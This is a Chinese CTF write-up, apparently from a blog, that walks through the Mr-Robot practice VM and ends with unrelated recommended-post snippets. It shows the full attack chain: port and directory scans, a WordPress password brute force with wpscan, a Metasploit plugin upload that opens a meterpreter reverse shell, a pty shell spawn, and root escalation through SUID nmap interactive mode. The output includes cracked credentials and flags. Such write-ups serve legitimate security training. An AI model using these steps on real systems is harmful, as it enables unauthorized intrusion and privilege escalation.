关于

  1. 下载地址
  2. 目标:找到3个Key
  3. 哔哩哔哩视频

信息收集

  1. 用的是Host-only,所以网卡是vmnet1,IP一直是192.168.7.1/24
  2. nmap -T4 192.168.7.1/24 -A

kali-team@LTS:~$ nmap -T4 192.168.7.1/24 -A

Nmap scan report for 192.168.7.129

Host is up (0.00075s latency).

Not shown: 997 filtered ports

PORT    STATE  SERVICE  VERSION

22/tcp  closed ssh

80/tcp  open   http     Apache httpd

|_http-server-header: Apache

|_http-title: Site doesn't have a title (text/html).

443/tcp open   ssl/http Apache httpd

|_http-server-header: Apache

|_http-title: Site doesn't have a title (text/html).

| ssl-cert: Subject: commonName=www.example.com

| Not valid before: 2015-09-16T10:45:03

|_Not valid after:  2025-09-13T10:45:03

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 256 IP addresses (2 hosts up) scanned in 47.44 seconds

kali-team@LTS:~$ curl http://192.168.7.129/robots.txt

User-agent: *

fsocity.dic

key-1-of-3.txt
  1. 发现第一个Key【073403c8a58a1f80d943455fb30724b9】,外加一个字典,下载字典到本地。
  2. 字典很大,可能有重复的,先优化一下。sort fsocity.dic | uniq > list.dic
  3. nikto -h http://192.168.7.129
kali-team@LTS:~/桌面$ nikto -h http://192.168.7.129

- Nikto v2.1.5

---------------------------------------------------------------------------

+ Target IP:          192.168.7.129

+ Target Hostname:    192.168.7.129

+ Target Port:        80

+ Start Time:         2018-06-19 20:37:10 (GMT8)

---------------------------------------------------------------------------

+ Server: Apache

+ IP address found in the 'x-mod-pagespeed' header. The IP is "1.9.32.3".

+ Uncommon header 'x-frame-options' found, with contents: SAMEORIGIN

+ Uncommon header 'x-mod-pagespeed' found, with contents: 1.9.32.3-4523

+ Retrieved x-powered-by header: PHP/5.5.29

+ Uncommon header 'x-pingback' found, with contents: http://192.168.7.129/xmlrpc.php

+ No CGI Directories found (use '-C all' to force check all possible dirs)

+ Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x29 0x52467010ef8ad

+ "robots.txt" retrieved but it does not contain any 'disallow' entries (which is odd).

+ OSVDB-3092: /admin/: This might be interesting...

+ Uncommon header 'tcn' found, with contents: choice

+ OSVDB-3092: /readme: This might be interesting...

+ Uncommon header 'link' found, with contents: <http://192.168.7.129/?p=23>; rel=shortlink

+ OSVDB-3092: /license.txt: License file found may identify site software.

+ /admin/index.html: Admin login page/section found.

+ Cookie wordpress_test_cookie created without the httponly flag

+ /wp-login/: Admin login page/section found.

+ /wordpress/: A Wordpress installation was found.

+ 6544 items checked: 0 error(s) and 16 item(s) reported on remote host

+ End Time:           2018-06-19 20:39:38 (GMT8) (148 seconds)

---------------------------------------------------------------------------

+ 1 host(s) tested
  1. 通过nikto简单扫描或者用dirsearch扫一下目录
kali-team@LTS:~/桌面$ dirsearch -u http://192.168.7.129 -e * |grep 200

[20:42:35] 301 -  235B  - /admin  ->  http://192.168.7.129/admin/

[20:42:36] 200 -    1KB - /admin/

[20:42:36] 200 -    1KB - /admin/?/login

[20:42:38] 200 -    1KB - /admin/index

[20:42:38] 200 -    1KB - /admin/index.html

[20:42:41] 301 -    0B  - /admin_area/index.php  ->  http://192.168.7.129/admin_area/

[20:43:15] 200 -    0B  - /favicon.ico

[20:43:23] 200 -    1KB - /index.html

[20:43:25] 200 -  504KB - /intro

[20:43:28] 200 -  309B  - /license.txt

[20:43:50] 200 -   64B  - /readme

[20:43:50] 200 -   64B  - /readme.html

[20:43:51] 200 -   41B  - /robots.txt

[20:43:56] 200 -    0B  - /sitemap

[20:43:56] 200 -    0B  - /sitemap.xml

[20:43:56] 200 -    0B  - /sitemap.xml.gz

[20:44:12] 200 -    0B  - /wp-content/

[20:44:12] 200 -    0B  - /wp-content/plugins/google-sitemap-generator/sitemap-core.php

[20:44:12] 200 -    3KB - /wp-login

[20:44:12] 200 -    3KB - /wp-login.php

[20:44:12] 200 -    3KB - /wp-login/
  1. 明显是一个WordPress,但是没有看到有用户发文章。打开登录页面枚举用户名,百度Mr.Robot发现黑客军团的主角叫Elliot,现在他提示密码错误了,说明用户名是对的。然后用刚刚发现的字典爆破。
  2. wpscan -u http://192.168.7.129 --username Elliot --wordlist list.dic
[+] Enumerating plugins from passive detection ...

[+] No plugins found passively

[+] Starting the password brute forcer

  [+] [SUCCESS] Login : Elliot Password : ER28-0652                                                                                                                                                         

  Brute Forcing 'Elliot' Time: 00:01:21 <=============================================================                                                                > (5637 / 11452) 49.22%  ETA: 00:01:24

  +----+--------+------+-----------+

  | ID | Login  | Name | Password  |

  +----+--------+------+-----------+

  |    | Elliot |      | ER28-0652 |

  +----+--------+------+-----------+

[+] Finished: Tue Jun 19 21:22:23 2018

[+] Elapsed time: 00:01:22

[+] Requests made: 5703

[+] Memory used: 32.516 MB

GetShell

  1. 第一种就是以前的登录改主题404模板
  2. 第二种要用到Metasploit,看自己喜欢。一个大坑!
msf > use exploit/unix/webapp/wp_admin_shell_upload

msf exploit(unix/webapp/wp_admin_shell_upload) > show options

Module options (exploit/unix/webapp/wp_admin_shell_upload):

   Name          Current Setting  Required  Description

   ----          ---------------  --------  -----------

   PASSWORD      ER28-0652        yes       The WordPress password to authenticate with

   PAYLOAD_NAME  Kali-Team        yes       Fix By Kali-Team payload_name to update with

   PLUGIN_NAME   WordPress        yes       Fix By Kali-Team plugin_name to update with

   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]

   RHOST         192.168.7.129    yes       The target address

   RPORT         80               yes       The target port (TCP)

   SSL           false            no        Negotiate SSL/TLS for outgoing connections

   TARGETURI     /                yes       The base path to the wordpress application

   USERNAME      Elliot           yes       The WordPress username to authenticate with

   VHOST                          no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description

   ----   ---------------  --------  -----------

   LHOST  192.168.7.1      yes       The listen address (an interface may be specified)

   LPORT  7788             yes       The listen port

Exploit target:

   Id  Name

   --  ----

   0   WordPress

msf exploit(unix/webapp/wp_admin_shell_upload) > set password ER28-0652

password => ER28-0652

msf exploit(unix/webapp/wp_admin_shell_upload) > set username Elliot

username => Elliot

msf exploit(unix/webapp/wp_admin_shell_upload) > set rhost 192.168.7.129

rhost => 192.168.7.129

msf exploit(unix/webapp/wp_admin_shell_upload) > run 

[*] Started reverse TCP handler on 192.168.7.1:4444

[-] Exploit aborted due to failure: not-found: The target does not appear to be using WordPress

[*] Exploit completed, but no session was created.

  1. 报错了,Google修复,可以上传,但是反弹不会来插件的路径。

    /opt/metasploit-framework/embedded/framework/modules/exploits/unix/webapp/wp_admin_shell_upload.rb

    用#注释掉下面两行

    fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online?

    fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless uploaded

  2. 再重新载入模块

msf exploit(unix/webapp/wp_admin_shell_upload) > reload

[*] Reloading module...

msf exploit(unix/webapp/wp_admin_shell_upload) > run 

[*] Started reverse TCP handler on 192.168.7.1:7788

[*] Authenticating with WordPress using Elliot:ER28-0652...

[+] Authenticated with WordPress

[*] Preparing payload...

[*] Uploading payload...

[*] Executing the payload at /wp-content/plugins/WordPress/Kali-Team.php...

[*] Sending stage (37775 bytes) to 192.168.7.129

[*] Meterpreter session 5 opened (192.168.7.1:7788 -> 192.168.7.129:36273) at 2018-06-19 23:13:10 +0800

ls

[!] This exploit may require manual cleanup of 'Kali-Team.php' on the target

[!] This exploit may require manual cleanup of 'WordPress.php' on the target

[!] This exploit may require manual cleanup of '../WordPress' on the target

提权

  1. 在robot用户的目录下找到了第二个Key,但是没权限查看。
meterpreter > ls

Listing: /home/robot

====================

Mode              Size  Type  Last modified              Name

----              ----  ----  -------------              ----

100400/r--------  33    fil   2015-11-13 15:28:21 +0800  key-2-of-3.txt

100644/rw-r--r--  39    fil   2015-11-13 15:28:21 +0800  password.raw-md5

meterpreter > cat password.raw-md5

robot:c3fcd3d76192e4007dfb496cca67e13b
  1. 把MD5破解出来,应该就是robot的密码了。
  2. 但是su在反弹回来的shell中执行不了。su: must be run from a terminal
  3. 转py可以进入交互模式python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'

daemon@linux:/home/robot$ su robot

su robot

Password: abcdefghijklmnopqrstuvwxyz

robot@linux:~$ id

id

uid=1002(robot) gid=1002(robot) groups=1002(robot)

robot@linux:~$ cat key-2-of-3.txt

cat key-2-of-3.txt

822c73956184f694993bede3eb39f959
  1. 第二个Key找到了!
  2. 最后提升到root权限,找开启了SUID权限的应用
robot@linux:/$ cd /root

cd /root

bash: cd: /root: Permission denied

robot@linux:/$ find / -perm -4000 -type f 2>/dev/null

find / -perm -4000 -type f 2>/dev/null

/bin/ping

/bin/umount

/bin/mount

/bin/ping6

/bin/su

/usr/bin/passwd

/usr/bin/newgrp

/usr/bin/chsh

/usr/bin/chfn

/usr/bin/gpasswd

/usr/bin/sudo

/usr/local/bin/nmap

/usr/lib/openssh/ssh-keysign

/usr/lib/eject/dmcrypt-get-device

/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper

/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper

/usr/lib/pt_chown

robot@linux:/$
  1. 低版本的nmap可以用交互模式,而且上面说的是root权限。!后面接着命令就可以了。
robot@linux:/$ nmap --help

nmap --help

Nmap 3.81 Usage: nmap [Scan Type(s)] [Options] <host or net list>

Some Common Scan Types ('*' options require root privileges)

* -sS TCP SYN stealth port scan (default if privileged (root))

  -sT TCP connect() port scan (default for unprivileged users)

* -sU UDP port scan

  -sP ping scan (Find any reachable machines)

* -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only)

  -sV Version scan probes open ports determining service & app names/versions

  -sR RPC scan (use with other scan types)

Some Common Options (none are required, most can be combined):

* -O Use TCP/IP fingerprinting to guess remote operating system

  -p <range> ports to scan.  Example range: 1-1024,1080,6666,31337

  -F Only scans ports listed in nmap-services

  -v Verbose. Its use is recommended.  Use twice for greater effect.

  -P0 Don't ping hosts (needed to scan www.microsoft.com and others)

* -Ddecoy_host1,decoy2[,...] Hide scan using many decoys

  -6 scans via IPv6 rather than IPv4

  -T <Paranoid|Sneaky|Polite|Normal|Aggressive|Insane> General timing policy

  -n/-R Never do DNS resolution/Always resolve [default: sometimes resolve]

  -oN/-oX/-oG <logfile> Output normal/XML/grepable scan logs to <logfile>

  -iL <inputfile> Get targets from file; Use '-' for stdin

* -S <your_IP>/-e <devicename> Specify source address or network interface

  --interactive Go into interactive mode (then press h for help)

Example: nmap -v -sS -O www.my.com 192.168.0.0/16 '192.88-90.*.*'

SEE THE MAN PAGE FOR MANY MORE OPTIONS, DESCRIPTIONS, AND EXAMPLES

robot@linux:/$

robot@linux:/$ nmap --interactive

nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )

Welcome to Interactive Mode -- press h <enter> for help


nmap> !id

!id

uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)

waiting to reap child : No child processes

nmap>

Unknown command (ls) -- press h <enter> for help

nmap/> !ls

!ls

bin   dev  home        lib    lost+found  mnt  proc  run   srv	tmp  var

boot  etc  initrd.img  lib64  media	  opt  root  sbin  sys	usr  vmlinuz

waiting to reap child : No child processes

nmap> !ls /root

!ls /root

firstboot_done	key-3-of-3.txt

waiting to reap child : No child processes

nmap> cat /root/key-3-of-3.txt

cat /root/key-3-of-3.txt

Unknown command (cat) -- press h <enter> for help

nmap> !cat /root/key-3-of-3.txt

!cat /root/key-3-of-3.txt

04787ddef27c3dee1ee161b21670b4e4

waiting to reap child : No child processes

nmap>

彩蛋

  1. 其实账号密码别人已经给你了http://192.168.7.129/license.txt
  2. 拿到ZWxsaW90OkVSMjgtMDY1Mgo=
  3. base64解一下echo ZWxsaW90OkVSMjgtMDY1Mgo= |base64 --decode
  4. elliot:ER28-0652

[Write-up]Mr-Robot的更多相关文章

  1. metasploit渗透初探MR.robot(一)

    看了MR.robot,有一种研究渗透技术的冲动, 网上也看了些教程,要从kali linux说起, 下载vmware 12,http://www.vmware.com/go/tryworkstatio ...

  2. 10 Best TV Series Based On Hacking And Technology

    Technology is rapidly becoming the key point in human lives. Here we have discussed top TV shows whi ...

  3. 开启属于你的GNOME桌面

    图片剪辑源自美剧<黑客军团>(英语:Mr. Robot) GNOME(GNU Network ObjectEnvironment)是一种GNU网络对象模型环境 ,GNU计划的一部分,目的为 ...

  4. Hacking HackDay: Albania

    概述: Name: HackDay: Albania Date release: 18 Nov 2016 Author: R-73eN Series: HackDay 下载: https://down ...

  5. Swift.Operator-and-Items-in-Swift(1)

    Operator and Item 1. ..< a for-in loop and the half-open range operator (..<) // Check each pa ...

  6. ThinkPad T43续命记

    // Description: 原作于2016年8月25日. Mr. Robot 最近有部叫<黑客军团>(Mr. Robot)的戏比较火.目前第二季已经出到一大半了,深得技术宅和技术宅仰慕 ...

  7. Hijacking FM Radio with a Raspberry Pi & Wire

    转载:https://null-byte.wonderhowto.com/how-to/hack-radio-frequencies-hijacking-fm-radio-with-raspberry ...

  8. online QRcode generator , QRcode=== (Quick Response Code) , 二维条码,二维码,彩色二维码,图片二维码,

    online QRcode generator ,  QRcode=== (Quick Response Code)    , 二维条码,二维码,彩色二维码,图片二维码, 1 http://cli.i ...

  9. VR ( Virtual Reality )、AR(Augmented Reality)、MR(Mix Reality)和CR(Cinematic Reality)是什么鬼?

    整个社会对虚拟现实的研究和开发源于上个世纪六十年代,计算机图形学.人机接口技术.图像处理与模式识别.多传感技术.语音处理与音响技术.高性能计算机系统.人工智能等领域在之后半个世纪取得了长足的发展为虚拟 ...

随机推荐

  1. List(数组)里面常用的属性和方法

    常用属性: length 长度 reversed 翻转 isEmpty 是否为空 isNotEmpty 是否不为空常用方法: add 增加 addAll 拼接数组 增加多个数据 list.addAll ...

  2. POJ - 1845 Sumdiv(分治)

    题意:求$A^{B}$的所有约数之和$mod\ 9901$ 思路:由结论有,一个数$n$进行质因数分解得到$n={p_{1}}^{c_{1}} * {p_{2}}^{c_{2}} *...* {p_{ ...

  3. 【译】高级T-SQL进阶系列 (七)【上篇】:使用排序函数对数据进行排序

    [译注:此文为翻译,由于本人水平所限,疏漏在所难免,欢迎探讨指正] 原文链接:传送门. 什么是排序函数(Ranking Functions)? 排序函数基于一组记录的集合返回一个排序值.一个排序值其实 ...

  4. ZOJ 1002 Fire Net(dfs)

    嗯... 题目链接:https://zoj.pintia.cn/problem-sets/91827364500/problems/91827364501 这道题是想出来则是一道很简单的dfs: 将一 ...

  5. P1047

    题目不难...但坑得是数据大小..N 的大小越大越好... #include <bits/stdc++.h> #include <cstdio> #include <cm ...

  6. 重磅消息,Micrium的uCOS全家桶将推出免费商业授权

    说明: 1.预计将在下个月末的Embedded World 2020正式宣布开源免费商用. 2.uCOS全家桶一旦宣布免费商用,将给那些还在收费的RTOS带来一波冲击.其中最值的关注的是去年微软收购T ...

  7. 模仿虎牙App 导航栏切换

    昨天看虎牙直播,发现导航栏挺有意思,自己也做个玩玩 <view class="tab_list row"> <view class="tab_item ...

  8. elasticsearch数据组织结构

    elasticsearch数据组织结构 1.      mapping 1.1.    简介 mapping:意为映射关系,特别是指组织结构.在此语境中可理解为数据结构,包括表结构,表约束,数据类型等 ...

  9. elasticsearch ik解析器

    ik解析器 1.      ik解析器 The IK Analysis plugin integrates Lucene IK analyzer (http://code.google.com/p/i ...

  10. byte的取值范围

    byte b = Byte.MAX_VALUE;        b+=1;        System.out.println(b); //输出为-128 取值范围为[-128 -  127] 解析: ...